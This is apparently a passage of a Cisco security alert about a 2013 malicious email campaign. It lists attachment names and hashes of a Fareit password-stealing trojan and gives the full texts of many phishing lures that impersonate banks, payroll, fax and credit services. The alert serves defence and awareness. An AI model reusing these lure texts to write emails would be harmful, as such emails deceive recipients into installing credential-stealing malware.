\n_Credit_Report_14032013.zip_ \n_Credit_Report_14032013.exe_ \n_ATO_TAX_99188237.zip_ \n_ATO_TAX_99188237.exe_ \n_inv_#02898751300_03152013.zip_ \n_inv_#0{DIGIT[10]}_03152013.exe_ \n_Case_830980982.zip_ \n_Case_830980982.exe_ \n_Verification_8473957.zip_ \n_Verification_03042013.exe_ \n_fax_message_4619523868917800957382.zip_ \n_fax_message_{DIGIT[22]}.exe_ \n_Form_04042013.zip_ \n_Form_04042013.exe_ \n_Case_830980982.zip_ \n_Case_08042013.exe_ \n_cashpro_digital_cert_{DIGIT[19].exe_ \n_Invoice_983661718291.zip_ \n_Invoice_983661718291.exe_ \n_Case_9549969.zip_ \n_Case_04152013.exe_ \n_Identity_Form_04182013.zip_ \n_Identity_Form_04182013.exe_ \n_PP_04222013.zip_ \n_PP_04222013.exe_ \n_fax0100113928.zip_ \n_fax01001{DIGIT[5]}.exe_ \n_fax00001312189.zip_ \n_fax00001{DIGIT[6]}.exe_ \n_FAX_id617753450845415845763901017560.zip_ \n_FAX_id{DIGIT[30]}.exe_ \n_PostFinance message service - debit posted.zip_ \n_PostFinance message service - debit posted.exe_ \n_ADP_inv_#06822243896_051013.zip_ \n_ADP_inv_#0{DIGIT[10]}_051013.exe_ \n_incoming_fax_2896106719.zip_ \n_incoming_fax_{DIGIT[10]}.exe_ \n_ADP_INVOICE_#0205646_052413.zip_ \n_ADP_INVOICE_#0{DIGIT[6]}_052413.exe_ \n_wupos_digital_cert_1152344531108234009.zip_ \n_wupos_digital_cert_{DIGIT[19]}.exe_ \n_fax_message_4590834859833614850483.zip_ \n_fax_message_{DIGIT[22]}.exe_ \n_inv_#09968498908_06212013.zip_ \n_inv_#0{DIGIT[10]}_06212013.exe_ \n_ADDACS Advice Report #98648288.zip_ \n_ADDACS Advice Report #{DIGIT[8]}.exe_ \n_inc_wire_report_365229777_07012013.zip_ \n_inc_wire_report_{DIGIT[9]}_07012013.exe_ \n_fax_id3966977355149237202.zip_ \n_fax_id{DIGIT[19]}.exe_ \n_Auto refund report 947397428.zip_ \n_Auto refund report {DIGIT[9]}.exe_ \n_case#989290388298534~9593505644124.zip_ \n_case#9{DIGIT[14]}~9{DIGIT[12]}.exe_ \n_UPS Invoice 41390141.zip_ \n_UPS Invoice {DIGIT[8]}.exe_ \n_ADDACS Advice Report #483496.zip_ \n_ADDACS Advice Report #{DIGIT[6]}.exe_ \n_wupos_digital_cert_716867193.zip_ \n_wupos_digital_cert_{DIGIT[9]}.exe \nsecure_message_08142013_15075788893140908.zip \nsecure_message_08142013_{DIGIT[17]}.exe \nfax01001444020.zip \nfax01001{DIGIT[6]}.exe \nreport_265753681627.zip \nreport_{DIGIT[12]}.exe \nUPS Invoice 80501156.zip \nACAS08291305663417PARA9067.zip \nACAS082913{DIGIT[8]}PARA{DIGIT[4]}.exe \n_\n\nThe _cashpro_digital_cert_{DIGIT[19]}.exe_ file in the _cashpro_digital_cert_0115793115810218904.zip_ attachment has a file size of 139,264 bytes. The MD5 checksum, which is a unique identifier of the executable, is the following string: 0xD89E680D6E9FEE363B27E6479A4DFFD3 \n \nThe _incoming_fax_02212013_{DIGIT[19]}.exe_ file in the _incoming_fax_02212013_1497271871046855581.zip_ attachment has a file size of 133,120 bytes. The MD5 checksum is the following string: 0xB4771C21637E4A5F933672DA9783687B \n \nThe _fax_26022013_{DIGIT[19]}.exe_ file in the _fax_26022013_6058380428875401665.zip_ attachment has a file size of 163,840 bytes. The MD5 checksum is the following string: 0xC1625A7BF2ADDD13FBEC585570C4C36E \n \nThe _fax_id{DIGIT[18]}_02262013.exe_ file in the _fax_id883826187478237567_02262013.zip_ attachment has a file size of 163,840 bytes. The MD5 checksum is the following string: 0x3426A93A9ED520BE3C9BAED8BEC2E2CD \n \nThe _SecureMessage_{DIGIT[20]}.exe_ file in the _SecureMessage_21125128673745134251.zip_ attachment has a file size of 156,160 bytes. The MD5 checksum is the following string: 0xF565258F8086F115AE517F8A4C158683 \n \nThe _ACH_Batch_11032013.exe_ file in the _ACH_Batch_6002132.zip_ attachment has a file size of 133,632 bytes. The MD5 checksum is the following string: 0x69C90E7D31BEFA0B739F675AD9F2FC5E \n \nThe _ADP_PAYROL_19289981.exe_ file in the _ADP_PAYROL_19289981.zip_ attachment has a file size of 135,680 bytes. The MD5 checksum is the following string: 0x1DE7DB633D7767DC7DA45256753D6114 \n \nThe _Credit_Report_03142013.exe_ file in the _Credit_Report_03142013.zip_ attachment has a file size of 135,680 bytes. The MD5 checksum is the following string: 0x06EC09DBAED6ECA1C7D1FB936E094822 \n \nThe _cashpro_digital_cert_{DIGIT[19]}.exe_ file in the _cashpro_digital_cert_8540516074817067661.zip_ attachment has a file size of 132,096 bytes. The MD5 checksum is the following string: 0x5CF4BD47458D85601C2143018F145DE5 \n \nThe _Credit_Report_14032013.exe_ file in the _Credit_Report_14032013.zip_ attachment has a file size of 135,680 bytes. The MD5 checksum is the following string: 0x310D6A1A2F03C0EE3483D84A09A132BA \n \nThe _ATO_TAX_99188237.exe_ file in the _ATO_TAX_99188237.zip_ attachment has a file size of 135,680 bytes. The MD5 checksum is the following string: 0x92E19F6B9F33AC3CD54EC86BC34B6EAA \n \nThe_ inv_#0{DIGIT[10]}_03152013.exe _file in the _inv_#02898751300_03152013.zip_ attachment has a file size of 135,680 bytes. The MD5 checksum is the following string: 0x669D4A4B7DFCD38B05AF8704B4A55B9A \n \nThe _Case_830980982.exe_ file size in the _Case_830980982.zip_ attachment is unavailable. The MD5 checksum is also unavailable. \n \nThe _Verification_03042013.exe_ file in the _Verification_8473957.zip_ attachment has a file size of 107,520 bytes. The MD5 checksum is the following string: 0x4080C86BE6B72ED2E28DF0A5A5D65A6B \n \nThe _fax_message_{DIGIT[22]}.exe_ file in the _fax_message_4619523868917800957382.zip_ attachment has a file size of 200,704 bytes. The MD5 checksum is the following string: 0x36FA4163D903FBF0010C7604325834A2 \n \nThe _Form_04042013.exe_ file in the _Form_04042013.zip_ attachment has a file size of 91,648 bytes. The MD5 checksum is the following string: 0x26BCA7FF0FB9B0CCBD75C2A0DABCEF36 \n \nThe _Case_08042013.exe_ file in the _Case_830980982.zip_ attachment has a file size of 130,560 bytes. The MD5 checksum is the following string: 0xAE4E37F3FDAFE07B17EE38E5DC82DFE7 \n \nThe _cashpro_digital_cert_{DIGIT[19]}.exe_ file has a file size of 96,256 bytes. The MD5 checksum is the following string: 0xF27592CF87C12B6401AD9742F3004597 \n \nThe _Invoice_983661718291.exe_ file in the _Invoice_983661718291.zip_ attachment has a file size of 131,584 bytes. The MD5 checksum is the following string: 0x47C65EE00EBC57C93C146964A0B77E56 \n \nThe _Case_04152013.exe_ file in the _Case_9549969.zip_ attachment has a file size of 137,728 bytes. The MD5 checksum is the following string: 0x28A03BD60463568E8F9F217FB0A2D48D \n \nThe _Identity_Form_04182013.exe_ file in the _Identity_Form_04182013.zip _attachment has a file size of 134,144 bytes. The MD5 checksum is the following string: 0xC5F1D95079CFA622D06C6F2617AC21F2 \n \nThe _PP_04222013.exe_ file in the _PP_04222013.zip_ attachment has a file size of 135,168 bytes. The MD5 checksum is the following string: 0x65FC7B009E9B653DDEBE8788C268FDAA \n \nThe _fax01001{DIGIT[5]}.exe_ file in the _fax0100113928.zip_ attachment has a file size of 137,728 bytes. The MD5 checksum is the following string: 0x5EBF07A884E9AC3F396A3B2586F8010F \n \nThe _fax00001{DIGIT[6]}.exe_ file in the _fax00001312189.zip_ attachment has a file size of 131,584 bytes. The MD5 checksum is the following string: 0x30F5913F4D1BD1778FD03D7875749A4A \n \nThe _FAX_id{DIGIT[30]}.exe_ file in the _FAX_id617753450845415845763901017560.zip_ attachment has a file size of 137,216 bytes. The MD5 checksum is the following string: 0x8C830CFDD2B5829B9164862E2457780A \n \nThe _PostFinance message service - debit posted.exe_ file in the _PostFinance message service - debit posted.zip_ attachment has a file size of 136,192 bytes. The MD5 checksum is the following string: 0xBDF65C738335D2169EABF16CF6470562 \n \nThe _ADP_inv_#0{DIGIT[10]}_051013.exe_ file in the _ADP_inv_#06822243896_051013.zip_ attachment has a file size of 124,928 bytes. The MD5 checksum is the following string: 0xAF0745BC24BB7EFEF5193788F036C9C2 \n \nThe _incoming_fax_{DIGIT[10]}.exe_ file in the _incoming_fax_2896106719.zip_ attachment has a file size of 125,440 bytes. The MD5 checksum is the following string: 0x81396414C0F14AFDA076FE6C1D4F0DAD \n \nThe _ADP_INVOICE_#0{DIGIT[6]}_052413.exe_ file in the _ADP_INVOICE_#0205646_052413.zip_ attachment has a file size of 121,344 bytes. The MD5 checksum is the following string: 0xF9182E5F13271CEFC2695BAA11926FAB \n \nThe _wupos_digital_cert_{DIGIT[19]}.exe_ file in the _wupos_digital_cert_1152344531108234009.zip_ attachment has a file size of 127,488 bytes. The MD5 checksum is the following string: 0x4F4C19F4B477C4A3E9E84ECBC2D253EB \n \nThe _fax_message_{DIGIT[22]}.exe_ file in the _fax_message_4590834859833614850483.zip_ attachment has a file size of 85,504 bytes. The MD5 checksum is the following string: 0x292EFFBB7ACB63243EA691006B70AAA3 \n \nThe _inv_#0{DIGIT[10]}_06212013.exe_ file in the _inv_#09968498908_06212013.zip_ attachment has a file size of 82,944 bytes. The MD5 checksum is the following string: 0xF6EEF8B4B979A0B4EAE8F2D5E429C223 \n \nThe _ADDACS Advice Report #{DIGIT[8]}.exe_ file in the _ADDACS Advice Report #98648288.zip_ attachment has a file size of 97,280 bytes. The MD5 checksum is the following string: 0x9260A55B41D60FB77F496E9293D5F1EC \n \nThe _inc_wire_report_{DIGIT[9]}_07012013.exe_ file in the _inc_wire_report_365229777_07012013.zip_ attachment has a file size of 130,048 bytes. The MD5 checksum is the following string: 0x688790C7A6FD331B730E61C673F3BDF1 \n \nThe _fax_id{DIGIT[19]}.exe_ file in the _fax_id3966977355149237202.zip_ attachment has a file size of 123,904 bytes. The MD5 checksum is the following string: 0x6C869FA3D850A4B6D054E15EDC90AB8D \n \nThe _Auto refund report {DIGIT[9]}.exe_ file in the _Auto refund report 947397428.zip_ attachment has a file size of 117,248 bytes. The MD5 checksum is the following string: 0x6E748EEDA0C8EF7A36ED79CBE8C6682E \n \nThe _case#9{DIGIT[14]}~9{DIGIT[12]}.exe_ file in the _case#989290388298534~9593505644124.zip_ attachment has a file size of 113,152 bytes. The MD5 checksum is the following string: 0xCB16957C7C3D91AA684B1CB008E86986 \n \nThe _UPS Invoice {DIGIT[8]}.exe_ file in the _UPS Invoice 41390141.zip_ attachment has a file size of 116,224 bytes. The MD5 checksum is the following string: 0x328D25DE0F02766C76927D9120A5532D \n \nThe _ADDACS Advice Report #{DIGIT[6]}.exe_ file in the _ADDACS Advice Report #483496.zip_ attachment has a file size of 117,248 bytes. The MD5 checksum is the following string: 0x272B03C4F83A662CA7A841FE51736329 \n \nThe _wupos_digital_cert_{DIGIT[9]}.exe_ file in the _wupos_digital_cert_716867193.zip_ attachment has a file size of 130,560 bytes. The MD5 checksum is the following string: 0x6429931107F902D67850276064DE111B \n \nThe _secure_message_08142013_{DIGIT[17]}.exe_ file in the _secure_message_08142013_15075788893140908.zip_ attachment has a file size of 121,344 bytes. The MD5 checksum is the following string: 0xABAFB7DA0F23112064F6BC3A1F93DDF6 \n \nThe _fax01001{DIGIT[6]}.exe_ file in the _fax01001444020.zip_ attachment has a file size of 121,344 bytes. The MD5 checksum is the following string: 0x545C1A410A986911BFC0B743C7657A0A \n \nThe _report_{DIGIT[12]}.exe_ file in the _report_265753681627.zip_ attachment has a file size of 119,296 bytes. The MD5 checksum is the following string: 0x6EBF2EA3DB16B3E912068D0A9E33320E \n \nA variant of the _UPS Invoice {DIGIT[8]}.exe_ file in the _UPS Invoice 80501156.zip_ attachment has a file size of 115,712 bytes. The MD5 checksum is the following string: 0x7AF6CD41836D1B9FE7834C3C1CE61BED \n \nThe _ACAS082913{DIGIT[8]}PARA{DIGIT[4]}.exe_ file in the _ACAS08291305663417PARA9067.zip_ attachment has a file size of 31,232 bytes. The MD5 checksum is the following string: 0xF9A37404F1150C48AEC238BAC44977FC \n \nThe following text is a sample of the email message that is associated with this threat outbreak: \n\n> Subject: **Your CashPro Online Digital Certificate** \n \nMessage Body: \n \n**Dear CashPro Customer, \nThis email is being sent to inform you that you have been granted a new digital certificate for use with Bank of America CashPro\u00ae Online. \nPlease open the attachment and you will be guided through a simple process to install your new digital certificate. \nIf you have any questions or concerns, please contact the Bank of America technical help desk. \nThank you for your business, \nBank of America \nCashPro Online Security Team \nPlease do not reply to this email . \n\u00a9Copyright 2013 Bank of America Merrill Lynch. All rights reserved. CashPro is a registered trademark of Bank of America Corporation. **\n\nOr \n\n> Subject: **Corporate eFax message - 4 pages** \n \nMessage Body: \n \n**Fax Message [Caller-ID: 627-420-2187] \nYou have received a 4 pages fax at 26-02-2013 14:47:11 . \nView this fax using your PDF reader. \nPlease visit www.eFax.com/en/efax/twa/page/help if you have any questions regarding this message or your service. \nThank you for using the eFax service! \nHome Contact Login \nPowered by j2 \n2013 j2 Global Communications, Inc. All rights reserved. \neFax is a registered trademark of j2 Global Communications, Inc. \nThis account is subject to the terms listed in the eFax Customer Agreement.**\n\nOr \n\n> Subject: **Subject: Corporate eFax message - 5 pages** \n \nMessage Body: \n \n**Fax Message [Caller-ID: 949-399-2699] \nYou have received a 5 pages fax at 2013-02-26 10:04:10 EST. \nView this fax using your PDF reader. \nPlease visit www.eFax.com/en/efax/twa/page/help if you have any questions \nregarding this message or your service. \nThank you for using the eFax service! \nHome Contact Login \nPowered by j2 \n2011 j2 Global Communications, Inc. All rights reserved. \neFax is a registered trademark of j2 Global Communications, Inc. \nThis account is subject to the terms listed in the eFax Customer Agreement. **\n\nOr \n\n> Subject: **ACH Batch Download Notification - Batch ID#: 6002132** \n \nMessage Body: \n \n**The following ACH batch has been submitted for processing. \nInitiated By: keren_tf \nInitiated Date &amp; Time: Mon, 11 Mar 2013 10:06:00 -0500 \nBatch ID: 6002132 \nBatch Template Name: PAYROLL \nPlease view the attached file to review the transaction details **\n\nOr \n\n> Subject: **ADP - FedEx Shipment Notification** \n \nMessage Body: \n \n**Your payroll document(s) were shipped by ADP on 03/13/2013 via FedEx. \nPlease use the FedEx shipment tracking number(s) below to monitor the location of your payroll package(s). \nYou can access this information by simply clicking on your FedEx tracking number(s). \nFor more details , please download the attached file. \nIf you have any questions regarding this email you may contact me by using the information below. \nSincerely, \nTrey_Ortiz \n888/220-7406 \nTrey_Ortiz@adp.com **\n\nOr \n\n> Subject: **IMPORTANT - A Key Change Has Been Posted** \n \nMessage Body: \n \n**This email was sent because it contains important information about your account. Please note that if you have previously unsubscribed from Experian.com, you will no longer receive newsletters or special offers. However, you will continue to receive email notifications regarding your account. To ensure that you'll receive emails from us, please add support@exprpt.com to your address book. \nExperian \nMembership ID #006394477A Key Change Has Been Posted to One of Your Credit ReportsA key change has been posted to one of your three national Credit Reports. Each day we monitor your Experian\u00ae, Equifax and TransUnion Credit Reports for key changes that may help you detect potential credit fraud or identity theft. Even if you know what caused your Report to change, you don't know how it will affect your credit, so we urge you to do the following:View detailed report by opening the attachment. \nYou will be prompted to open (view) the file or save (download) it to your computer. \nFor best results, save the file first, then open it in a Web browser. \nContact our Customer Care Center with any additional questions.Note: The attached file contains personal data. \nYour Experian.com membership gives you the confidence you need to look after your credit. We encourage you to log-in regularly to take full advantage of the benefits your membership has to offer, such as unlimited access to your Credit Report and Score Tracker. Notifications like this are an important part of your membership, and in helping you stay on top of your credit. \n*If it has been less than thirty days since you joined Experian.com, your monthly credit statement includes your information for the period of time you have been enrolled. \nfreecreditreport.com**\n\nOr \n\n> Message Body: \n \n**CashPro Customer, \nThis email is being sent to inform you that you have been granted a new digital certificate for use with Bank of America CashPro Online.Please open the attachment and you will be guided through a simple process to install your new digital certificate.If you have any questions or concerns, please contact the Bank of America technical help desk.Thank you for your business,Bank of AmericaCashPro Online Security TeamPlease do not reply to this email .Copyright 2013 Bank of America Merrill Lynch. All rights reserved. CashPro is a registered trademark of Bank of America Corporation.**\n\nOr \n\n> Subject:** IMPORTANT - A Key Change Has Been Posted** \n \nMessage Body: \n \n**Membership ID #468894524A Key Change Has Been Posted to One of Your Credit ReportsA key change has been posted to one of your three national Credit Reports. Each day we monitor your Experian\u00ae, Equifax. and TransUnion. Credit Reports for key changes that may help you detect potential credit fraud or identity theft. Even if you know what caused your Report to change, you don't know how it will affect your credit, so we urge you to do the following:View detailed report by opening the attachment. \nYou will be prompted to open (view) the file or save (download) it to your computer. \nFor best results, save the file first, then open it in a Web browser. \nContact our Customer Care Center with any additional questions.Note: The attached file contains personal data. \nYour Experian.com membership gives you the confidence you need to look after your credit. We encourage you to log-in regularly to take full advantage of the benefits your membership has to offer, such as unlimited access to your Credit Report and Score Tracker. Notifications like this are an important part of your membership, and in helping you stay on top of your credit. \n*If it has been less than thirty days since you joined Experian.com, your monthly credit statement includes your information for the period of time you have been enrolled. \nfreecreditreport.com **\n\nOr \n\n> Message Body: \n \n**Transaction ID: 892549506CS104Z1N \nOur records indicate that you never responded to requests for additional information about this claim. We hope you review the attached file and solve the situation amicably. \nFor more details please see the attached file. \nSincerely, \nProtection Services Department \nPayPal does not tolerate fraud or illegal activities. Your compliant has been noted in the record of the PayPal user you reported. If we find this user has violated our policies, we will investigate and take appropriate action&gt; \nIf this occurs, you may be contacted in the future about the status of this compliant. \nTo make sure future transactions proceed smoothly, we suggest you visit the PayPal site and click the Security Center link located at the top of any **\n\nOr \n\n> Subject: **Outgoing Money Transfer** \n \nMessage Body: \n \n**Fiserv Logo \nMoney Transfer Verification \nAn outgoing money transfer request has been received by=your financial institution. In order to complete the money transfer ple=se print and sign the attached form.To avoid delays or additional fees please be sure Benef=ciary Information including name, branch name, address, city, state, cou=try, and RTN or SWIFT BIC Code is correct. For international Wires be su=e you include the International Routing Code (IRC) and International Ban= Account Number (IBAN) for countries that require it. \nThank you, \nSue_Wall \nSenior Officer \nCash Management Verification \nPhone: 937-584-4335 \nEmail: Sue_Wall@fiserv.com \nCONFIDENTIALITY NOTICE: This electronic mail transmiss=on and any attached files contain information intended for the exclusive=use of the individual or entity to whom it is addressed and may contain =nformation belonging to the sender (Fiserv, Inc.) that is proprietary, p=ivileged, confidential and/or protected from disclosure under applicable=law. If you are not the intended recipient, you are hereby notified that=any viewing, copying, disclosure or distributions of this electronic mes=age are violations of federal law. Please notify the sender, by email or=telephone (800 722 3741), of any unintended recipients and delete the or=ginal message without making any copies. **\n\nOr \n\n> Subject: **New Complaint : 0219164** \n \nMessage Body: \n \n**Dun &amp; Bradstreet has received the =bove-referenced complaint from one of your customers regarding their =ealings with you. The details of the consumer's concern are included on =he reverse. Please review this matter and advise us of your =osition. \nIn the interest of time and good customer =elations, please provide the DnB with written verification of your =osition in this matter by March 12, 2013. Your prompt =esponse will allow DnB to be of service to you and your customer in =eaching a mutually agreeable resolution. Please inform us if you have =ontacted your customer directly and already resolved this =atter. \nThe Dun &amp; Bradstreet develops and maintains =eliability Reports on companies across the United States and Canada . =his information is available to the public and is frequently used by =otential customers. Your cooperation in responding to this complaint =ecomes a permanent part of your file with the Better Business Bureau. =strong&gt;Failure to promptly give attention to this matter may be =eflected in the report we give to consumers about your =ompany. \nWe encourage you to print this =omplaint (attached file), answer the questions and respond to =s. \nWe look forward to your prompt attention to =his matter. \n \nTo ensure =elivery of Dun &amp; Bradstreet Credibility Corp. emails to your inbox and =o enable images to load in future mailings, please add alerts@dandb.com to your email address book or =afe senders list. \nPrivacy and =nsubscribe Notice:?To unsubscribe or modify your email alert settings, please login =o your account, click \"alerts\", select \"alert settings\", and choose the =mail settings you wish to disable then click \"save\" to make the desired =hanges. Your privacy is important to us, please see our privacy policy. =o view our terms of service, please click here If you =ave any questions, email us at customerservice@DandB.com. Please do not reply to =his email.? 2012 Dun &amp; Bradstreet Credibility Corp.?Dun &amp; Bradstreet Credibility Corp. 103 JFK Parkway, Short Hills, =J 07078 **\n\nOr \n\n> Subject: **Your CashPro Online Digital Certificate** \n \nMessage Body: \n \n**Dear CashPro Customer, \nThis email is being sent to inform you that you have been granted a new digital certificate for use with Bank of America CashPro Online. \nPlease open the attachment and you will be guided through a simple process to install your new digital certificate. \nIf you have any questions or concerns, please contact the Bank of America technical help desk. \nThank you for your business, \nBank of America \nCashPro Online Security Team \nPlease do not reply to this email . \nCopyright 2013 Bank of America Merrill Lynch. All rights reserved. CashPro is a registered trademark of Bank of America Corporation. **\n\nOr \n\n> Subject: **Please respond - overdue payment** \n \nMessage Body: \n \n**Please find attached your invoices for the past months. Remit the payment by 04/11/2013 as outlines under our \"Payment Terms\" agreement. \nThank you for your business, \nSincerely, \nIsabel Bingham \nThis e-mail has been sent from an automated system. PLEASE DO NOT REPLY. \nThe information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify your representative immediately and delete this message from your computer. Thank you. **\n\nOr \n\n> Subject: **FW : Complaint - 8258423** \n \nMessage Body: \n \n**=A0 \nNew Complaint : 8258423 \nDun &amp; Bradstreet has received the above-refere=ced complaint from one of your customers regarding their dealings with y=u. The details of the consumer's concern are included on the reverse. Pl=ase review this matter and advise us of your position. \nIn the interest of time and good customer rela=ions, please provide the DnB with written verification of your position =n this matter by March 8, 2013. Your prompt response wi=l allow DnB to be of service to you and your customer in reaching a mutu=lly agreeable resolution. Please inform us if you have contacted your cu=tomer directly and already resolved this matter. \nThe Dun &amp; Bradstreet develops and maintains Re=iability Reports on companies across the United States and Canada . This=information is available to the public and is frequently used by potenti=l customers. Your cooperation in responding to this complaint becomes a =ermanent part of your file with the Better Business Bureau. Fail=re to promptly give attention to this matter may be reflected in the rep=rt we give to consumers about your company. \nWe encourage you to print this complai=t (attached file), answer the questions and respond to us. \nWe look forward to your prompt attention to th=s matter. \nTo ensure delivery of Dun &amp; Bradstre=t Credibility Corp. emails to your inbox and to enable images to load in=future mailings, please add alerts@dandb.com to your email ad=ress book or safe senders list. \nPrivacy and Unsubscribe Notice: \nhere If y=u have any questions, email us at mailto:customerservice@Dand=.com. Please do not reply to this email. \n\u00a9 2012 Dun &amp; Bradstreet Credibility Corp. \nDun &amp; Bradstreet Credibility Corp. 103 JFK Parkway, Short Hills, NJ=07078 **\n\nOr \n\n> Message Body: \n \n**We are writing you this email in regards to your PayPal account. In accordance with our \"Terms and Conditions\", article 3.2., we would like to kindly ask you to confirm your identity by completing the attached form. \nPlease print this form and fill in the requested information. Once you have filled out all the information on the form please send it to verification@paypal.com along with a personal identification document (identity card, driving license or international passport) and a proof of address submitted with our system ( bank account statement or utility bill ) \nYour case ID for this reason is PP-E5XB0XGHH7P5 \nFor your protection, we might limit your account access. We apologize for any inconvenience this may cause. \nThanks, \nPayPal \nCONFIDENTIALITY NOTICE: \nThis electronic mail transmission and any attached files contain information intended for the exclusive use of the individual or entity to whom it is addressed and may contain information belonging to the sender (PayPal , Inc.) that is proprietary, privileged, confidential and/or protected from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any viewing, copying, disclosure or distributions of this electronic message are violations of federal law. Please notify the sender of any unintended recipients and delete the original message without making any copies. Thank You \nPayPal Email ID PP67216 **\n\nOr \n\n> Subject: **Thank you for scheduling a payment to Bill Me Later** \n \nMessage Body: \n \n**BillMeLater \nLog in here \nYour Bill Me Later\u00ae statement is now available! \nDear Customer, \nThank you for making a payment online! We've received your \nBill Me Later\u00ae payment of $1843.54 and have applied it to your account. \nFor more details please check attached file \nSummary: Your Bill Me Later Account Number Ending in: 0746 \nYou Paid: $1843.54 \nYour Payment Date*: 04/03/2013 \nYour Payment Confirmation Number: 459432597798813984 \nDon't forget, Bill Me Later is the perfect way to shop when you want more time to pay for the stuff you need. Plus, you can always find great deals and discounts at over 1000 stores. Watch this short, fun video to learn more. \nBillMeLater \n*NOTE: If your payment date is Saturday, or a holiday, it will take an additional day for the payment to appear on your account. However, you will be credited for the payment as of the payment date. \nLog in at PayPal.com to make a payment \nQuestions: Do not reply to this email. Please send all messages through the email form on our website. We are unable to respond to account inquiries sent in reply to this email. Bill Me Later is located at 9690 Deereco Rd, Suite 110, Timonium, MD 21093 Copyright 2012 Bill Me Later Inc. \nBill Me Later accounts are issued by WebBank, Salt Lake City Utah \nP3D68LPP1 **\n\nOr \n\n> Subject: **ADP Payroll Invoice for week ending 05/10/2013** \n \nMessage Body: \n \n**Your ADP Payroll invoice for last week is attached for your review. If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance. \nThank you for choosing ADP Payroll. \nImportant: Please do not respond to this message. It comes from an unattended mailbox.**\n\nOr \n\n> Subject: **Corporate eFax message - 5 pages** \n \nMessage Body: \n \n**Fax Message [Caller-ID: 935-794-4376] \nYou have received a 5 pages fax at 05-20-2013 10:32:11 . \nView this fax using your PDF Editor. \nPlease visit www.eFax.com/en/efax/twa/page/help if you have any questions regarding this message or your service. \nThank you for using the eFax service! \nHome Contact Login \nPowered by j2 \n2013 j2 Global Communications, Inc. All rights reserved. \neFax is a registered trademark of j2 Global Communications, Inc. \nThis account is subject to the terms listed in the eFax Customer Agreement.**\n\nOr \n\n> Subject: **ADP Payroll Invoice for week ending 05/24/2013** \n \nMessage Body: \n \n**Your ADP Payroll invoice for last week is attached for your review. If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance. \nThank you for choosing ADP Payroll. \nImportant: Please do not respond to this message. It comes from an unattended mailbox.**\n\nOr \n\n> Subject: **ADP Payroll INVOICE for week ending 06/21/2013** \n \nMessage Body: \n \n**Your ADP Payroll invoice for last week is attached for your review. If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance. \nThank you for choosing ADP Payroll. \nImportant: Please do not respond to this message. It comes from an unattended mailbox. \n**\n\nOr \n\n\n> Subject: **You have received a secure message from Bank of America** \n \nMessage Body: \n \n**You have received a secure message. \nRead your secure message by opening the attachment. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it. \nIf you have concerns about the validity of this message, please contact the sender directly. \nFirst time users - will need to register after opening the attachment. \nHelp - https://securemail.bankofamerica.com/websafe/help?topic=Envelope**\n\nOr \n\n> Subject: **New incoming fax** \n \nMessage Body: \n \n**Dear Customer, \nYou have received a new fax. \nDate/Time: 2013:08:15 13:12:59 \nNumber of pages:4 \nReceived from: 08457 404 404 \nRegards, \nFAX**\n\nOr \n\n> Subject: **CEO Portal Statements &amp; Notices Event** \n \nMessage Body: \n \n**Commercial Electronic Office (CEO) Portal Statements &amp; Notices Event: Multiple Download Request Available \nYour Deposit Adjustment Notices is now available. To access your information please download attached report and open Statements &amp; Notices file. \nDate/Time Stamp: Fri, 16 Aug 2013 06:27:13 -0800 \nRequest Name: 4P9T5X5DQVEFMFQ \nEvent Message ID: S045-53650386 \nPlease do not reply to this email. \n**\n\nOr \n\n\n> Message Body: \n \n**New invoice(s) are available for the consolidated payment plan(s) / account(s) enrolled in the UPS Billing Center. Download the attachment. Invoice will be automatically shown by double click. **\n\nOr \n\n> Subject: **ACH Notification : ACH Process End of Day Report** \n \nMessage Body: \n \n**Attached is a summary of Origination activity for 08/29/2013 \nIf you need assistance please contact us via e-mail at paychexemail@paychex.com during regular business hours. \nThank you for your cooperation.**\n\n> **** \n\n\n> > > The malware associated with this threat outbreak appears to be a trojan that belongs to the _PWS:Win32/Fareit.gen!E_ [Microsoft] family. This trojan could capture all user keystrokes, make modifications to the registry key, and create a new process in the system. Reports indicate that this trojan may attempt to contact arbitrary hosts on the Internet and may produce outbound traffic on port 8080. \n \nCisco Security analysts examine real-world email traffic data that is collected from over 100,000 contributing organizations worldwide. This data helps provide a range of information about and analysis of global email security threats and trends. Cisco will continue to monitor this threat and automatically adapt systems to protect customers. This report will be updated if there are significant changes or if the risk to end users increases. \n \nCisco security appliances protect customers during the critical period between the first exploit of a virus outbreak and the release of vendor antivirus signatures. Email that is managed by Cisco and end users who are protected by Cisco Web Security Appliances will not be impacted by these attacks. Cisco security appliances are automatically updated to prevent both spam email and hostile web URLs from being passed to the end user. \n \n**Related Links** \n[Cisco Security](<http://www.cisco.com/security>) \n[Cisco SenderBase Security Network](<http://www.senderbase.org/>)\n\n## \n\nRevision History \n\n * Version | Description | Section | Date \n---|---|---|--- \n40 | Cisco Security has detected significant activity on August 30, 2013. | | 2013-August-30 17:50 GMT \n39 | Cisco Security has detected significant activity on August 26, 2013. \n \n| | 2013-August-26 19:11 GMT \n38 | Cisco Security has detected significant activity on August 16, 2013. \n \n| | 2013-August-16 18:17 GMT \n37 | Cisco Security has detected significant activity on August 15, 2013. \n \n| | 2013-August-15 18:50 GMT \n36 | Cisco Security has detected significant activity on August 14, 2013. \n \n| | 2013-August-14 18:32 GMT \n35 | Cisco Security has detected significant activity on July 22, 2013. \n \n| | 2013-July-22 16:00 GMT \n34 | Cisco Security has detected significant activity on July 15, 2013. \n \n| | 2013-July-15 16:06 GMT \n33 | Cisco Security has detected significant activity on July 12, 2013. \n \n| | 2013-July-15 12:05 GMT \n32 | Cisco Security has detected significant activity on July 11, 2013. \n \n| | 2013-July-12 11:22 GMT \n31 | Cisco Security has detected significant activity on July 11, 2013. \n \n| | 2013-July-11 13:29 GMT \n30 | Cisco Security has detected significant activity on July 3, 2013. \n \n| | 2013-July-05 14:06 GMT \n29 | Cisco Security has detected significant activity on July 1, 2013. \n \n| | 2013-July-02 14:18 GMT \n28 | Cisco Security has detected significant activity on June 28, 2013. \n \n| | 2013-June-28 13:58 GMT \n27 | Cisco Security has detected significant activity on June 24, 2013. \n \n| | 2013-June-24 15:13 GMT \n26 | Cisco Security has detected significant activity on June 14, 2013. \n \n| | 